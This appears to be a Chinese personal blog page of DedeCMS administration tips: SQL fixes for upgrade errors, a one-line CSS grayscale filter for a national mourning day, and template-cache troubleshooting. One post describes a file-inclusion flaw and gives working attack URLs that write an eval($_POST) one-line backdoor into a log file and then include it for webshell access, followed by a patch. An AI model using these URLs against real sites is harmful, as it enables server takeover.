阿彻和阿彻的博客

dedecms升级之后，有可能会出现这种情况，在修改栏目的时候出现
保存当前栏目更改时失败,请检查你的输入资料是否存在问题
这是什么原因呢？
我在网上找到解决方案，使用SQL命令就可以。
手工在“系统->SQL命令行工具” ，选择“多行命令”，然后将以下9条SQL代码全部复制进去，并运行。
ALTER TABLE `#@__admintype` CHANGE `rank` `rank` FLOAT( 6 ) DEFAULT ‘1′;
UPDATE `#@__admintype` set `rank`=(5 + (`rank`/10)) where `rank` > 10;
ALTER TABLE `#@__admin` CHANGE `usertype` `usertype` FLOAT( 6 ) UNSIGNED DEFAULT ‘0′;
UPDATE `#@__admin` set `usertype`=(5 + (`usertype`/10)) where `usertype` > 10;
INSERT INTO `#@__sysconfig` (`aid`, `varname`, `info`, `groupid`, `type`, `value`) VALUES (746, ‘cfg_album_mark’, ‘图集是否使用水印(小图也会受影响)’, 3, ‘bool’, [...]

此漏洞非常严重，可直接获得webshell。
inculde/datalistcp.class.php 第十行预览源代码打印关于1 require_once(DEDEINC.”/code/datalist.”.$codefile.”.inc”);
同时，inculde/dedesql.class.php 中预览源代码打印关于1 $errorTrackFile = dirname(__FILE__).”/../data/mysql_error_trace.inc”;
$codefile没有做过滤。
我们可以用datalistcp.class.php 包含mysql_error_trace.inc 执行PHP脚本程序。
利用方法：
www.sitedir.com.cn/plus/digg_frame … d&id=1024e1024&mid=*/eval%28$_POST[xxxxx]%29;/*
写入一句话后门
后门地址：
www.sitedir.com.cn/plus/comments_frame.php?needCode=gb2312.inc..\..\../../data/mysql_error_trace用一句话客户端连接
密码是：xxxxx
修补方案：
将inculde/datalistcp.class.php 第十行预览源代码打印关于1 require_once(DEDEINC.”/code/datalist.”.$codefile.”.inc”);
替换成：预览源代码打印关于1 //require_once(DEDEINC.”/code/datalist.”.$codefile.”.inc”);
2 $lang_pre_page = ”上页”;
3 $lang_next_page = ”下页”;
4 $lang_index_page = ”首页”;
5 $lang_end_page = ”末页”;
6 $lang_record_number = ”条记录”;
7 $lang_page = ”页”;
8 $lang_total = ”共”;
或者将$codefile直接替换成gb2313 utf-8等
总结：
之前一直以为inculde/dedesql.class.php 可以创建一个mysql_error_trace.php 并写入后门，后来测试下，发现不行。
然后找了inculde/datalistcp.class.php这么一个玩意。plus/comments_frame.php 是用来注册DEDEINC这个变量，否则不好使。
我这里给大家个建议 把PLUS里面的文件用不到的统统删除 尤其DIGG_ 2个文件

为表达中国各族人民对青海玉树地震遇难同胞深切哀悼，中国国务院决定，4月21日举行全国哀悼活动，中国和驻外使领馆下半旗志哀，停止一切公共娱乐活动。这是中国继2008年汶川大地震发生以后第二次为在自然灾害中遇难民众举国哀悼。
在此次活动中，所有大小网站也积极配合，将网站首页变色，很多人辛苦的修改css代码，其实不用这么麻烦，只需要一行代码即可，加入首页html代码的<head></head>之间即可：
<style>html{filter:progid:DXImageTransform.Microsoft.BasicImage(grayscale=1);} </style>

使用dedecms后台更新文档的时候，出现这个问题”模板文件不存在，无法解析文档”。
其实出现这个问题，并不是模板真的不存在，当然也有可能不存在。
处理方式：排除法。
1、我们先去看是不是真的文档不存在，有可能是误删或者其他的
2、如果排除这个问题，接下来就很简单了，直接在栏目找到更新缓存，然后再试，基本上都是可以顺利解决。
还有一点，一般新安装的网站后台，如果更换模板的时候，最好也进行缓存的更新，否则出现模板不好用的问题。

DEDECMS5.3-DEDECMS5.5，我采用的是重新安装，然后恢复数据库的方式，成功。
但是发布文章的时候，碰到这样一个错误 把数据保存到数据库主表 `dede_archives` 时出错，请把相关信息提交给DedeCms官方。Unknown column ‘dutyadmin’ in ‘field list’。
网上找了解决方法，应该有两种方法：
1、下载了一个v53升级到v55的升级包，主要要的是update.php文件，上传到了指定的位置，这里面主要是一些数据库操作的步骤，包括增加dutyadmin等字段的内容，运行一遍，ok！
2、直接使用SQL命令修复。
具体步骤：系统>>SQL命令行工具>>运行SQL命令行
以下为引用的内容：
ALTER TABLE `dede_archives` ADD `dutyadmin` MEDIUMINT( 8 ) UNSIGNED DEFAULT ‘0′ NOT NULL;
ALTER TABLE `dede_archives` ADD `tackid` INT( 10 ) DEFAULT ‘0′ NOT NULL ;
运行后，问题解决！